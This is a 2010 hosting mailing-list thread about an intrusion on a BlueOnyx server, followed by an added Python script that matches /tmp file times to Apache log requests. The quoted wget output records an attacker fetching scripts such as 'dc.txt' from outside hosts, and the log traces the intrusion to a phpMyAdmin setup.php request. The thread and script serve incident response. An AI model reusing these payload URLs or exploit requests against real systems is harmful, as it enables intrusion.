On Mon, 2010-11-29 at 09:44 -0800, Ken - Precision Web Hosting, Inc wrote:
> ----- Original Message -----
> From: "Gerald Waugh" <[email protected]>
> To: "BlueOnyx General Mailing List" <[email protected]>
> Sent: Monday, November 29, 2010 9:28 AM
> Subject: [BlueOnyx:05934] Re: hacker scripts
>
> > On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote:
> > > On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote:
> > > > On 29 Nov 2010, at 17:08, Gerald Waugh wrote:
> > > > > How can I stop these people from downloading and running their
> > > > > scripts in /tmp using httpd
> > > >
> > > > You need to find out how they did it. You're either hosting someone
> > > > naughty, or someone who has an insecure script. Who owns the files?
> > >
> > > apache.apache
> > >
> > > The server has a site with Drupal and some other blog stuff
> >
> > /tmp type ext3 (rw,noexec,nosuid)
> >
> > [Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not
> > exist:
> > /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526
> > --06:02:38-- http://193.136.136.86/quixplorer/readme.txt
> > => `readme.txt'
> > Connecting to 193.136.136.86:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 27,931 (27K) [text/plain]
> >
> > 0K .......... .......... ....... 100% 56.99 KB/s
> >
> > 06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]
> >
> > --06:02:39-- http://realezsites.com/pers/cowtipper524/dc.txt
> > => `dc.txt'
> > Resolving realezsites.com... 64.235.52.10
> > Connecting to realezsites.com|64.235.52.10|:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 2,140 (2.1K) [text/plain]
> >
> > 0K .. 100% 2.40 MB/s
> >
> > 06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140]
> >
> > --
> > Gerald
>
> Look at the time the files in the /tmp were created. Then look in your
> access logs and see what site / php script was accessed at that time.
> Check your drupal version and search on Google for
> "Exploits for Drupal version xxx"
[29/Nov/2010:06:02:37 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14061 "http://208.67.252.235/phpmyadmin/scripts/setup.php" "Opera"

looks like it's the phpmyadmin thing, I will have to find and move it...

_______________________________________________
Blueonyx mailing list
[email protected]
http://www.blueonyx.it/mailman/listinfo/blueonyx
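Ken's procedure above (take the creation time of the files in /tmp, then find the requests in the Apache access log at that moment) as an added example that is not part of this thread: a small Python script with assumed helper names `tmp_file_times` and `requests_near`. The sample log is constructed, with documentation-range client addresses, around the setup.php request quoted above, and the 06:02:38 reference time comes from the quoted wget output.

```python
import os
import re
from datetime import datetime, timedelta

# Apache "combined" log format, the layout of the access-log line quoted above.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"  # e.g. 29/Nov/2010:06:02:37 -0600

def tmp_file_times(directory="/tmp"):
    """(path, owner uid, mtime as an Apache-style timestamp) per regular file, newest first.
    Keep the rows owned by the web server uid (apache) and hand each timestamp to requests_near()."""
    rows = []
    for entry in os.scandir(directory):
        if entry.is_file(follow_symlinks=False):
            st = entry.stat(follow_symlinks=False)
            rows.append((st.st_mtime, entry.path, st.st_uid))
    return [(path, uid, datetime.fromtimestamp(t).astimezone().strftime(TS_FMT))
            for t, path, uid in sorted(rows, reverse=True)]

def requests_near(log_lines, when, window_seconds=30):
    """Parsed log entries whose timestamp lies within +/- window_seconds of `when`, oldest first."""
    centre = datetime.strptime(when, TS_FMT)
    window = timedelta(seconds=window_seconds)
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        entry = m.groupdict()
        entry["time"] = datetime.strptime(entry["ts"], TS_FMT)
        if abs(entry["time"] - centre) <= window:
            hits.append(entry)
    return sorted(hits, key=lambda e: e["time"])

# Constructed sample log. Client addresses are documentation-range placeholders; the
# setup.php request, status, size, referer and user agent are the ones quoted above.
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Nov/2010:05:50:25 -0600] "GET /trio.htm HTTP/1.1" 404 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Nov/2010:06:02:37 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14061 '
    '"http://208.67.252.235/phpmyadmin/scripts/setup.php" "Opera"',
    '203.0.113.9 - - [29/Nov/2010:06:02:40 -0600] "GET /node/12 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [29/Nov/2010:06:30:01 -0600] "GET /index.php HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
]
# The wget output quoted above shows the /tmp downloads starting at 06:02:38 local time.
if __name__ == "__main__":
    for e in requests_near(SAMPLE_LOG, "29/Nov/2010:06:02:38 -0600"):
        print(e["ts"], e["client"], e["request"], e["status"])
```

On a live box, run it against the real access log with `window_seconds` widened if the /tmp mtimes and the log clock are not on the same timezone or are a few seconds apart.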
